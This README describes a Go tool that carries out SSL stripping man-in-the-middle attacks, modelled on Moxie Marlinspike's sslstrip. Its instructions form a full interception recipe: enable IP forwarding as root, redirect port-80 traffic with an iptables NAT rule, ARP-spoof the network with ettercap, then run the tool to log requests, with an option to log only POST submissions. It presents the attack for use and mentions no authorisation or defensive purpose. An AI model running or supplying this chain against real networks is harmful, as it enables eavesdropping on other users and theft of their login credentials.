This is a tool that implements Moxie Marlinspike's SSL stripping attacks, written in Go. Inspired by https://github.com/moxie0/sslstrip.
The only requirment is Go. There are no further dependencies, only the standard library of the language. We have used Go version 1.9.2 but it should work fine with other versions as well. Please, open issue if you encounter a problem.
$ # clone the repo in your $GOPATH/src/sslstrip
$ cd $GOPATH/src/sslstrip/cli
$ go build main.go
$ ./main -h
Usage of ./main:
-filename string
the output log file or empty for stdout
-log-response
log responses
-port int
port to listen on (default 8000)
-post-only
log only POST requests
- Flip your machine into forwarding mode (as root):
$ echo "1" > /proc/sys/net/ipv4/ip_forward
- Setup iptables to intercept HTTP requests (as root):
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
- Run an arpspoof attack to redirect traffic to your machine. For example with ettercap
$ ettercap -q -T -M arp
- Run sslstrip with the command-line options you'd like (see above).
If you want to contribute feel free to send a pull request.
Also, if you found a bug or some wrong information in these pages you can open an issue.
This program is provided under an MIT open source license, read the LICENSE file for details.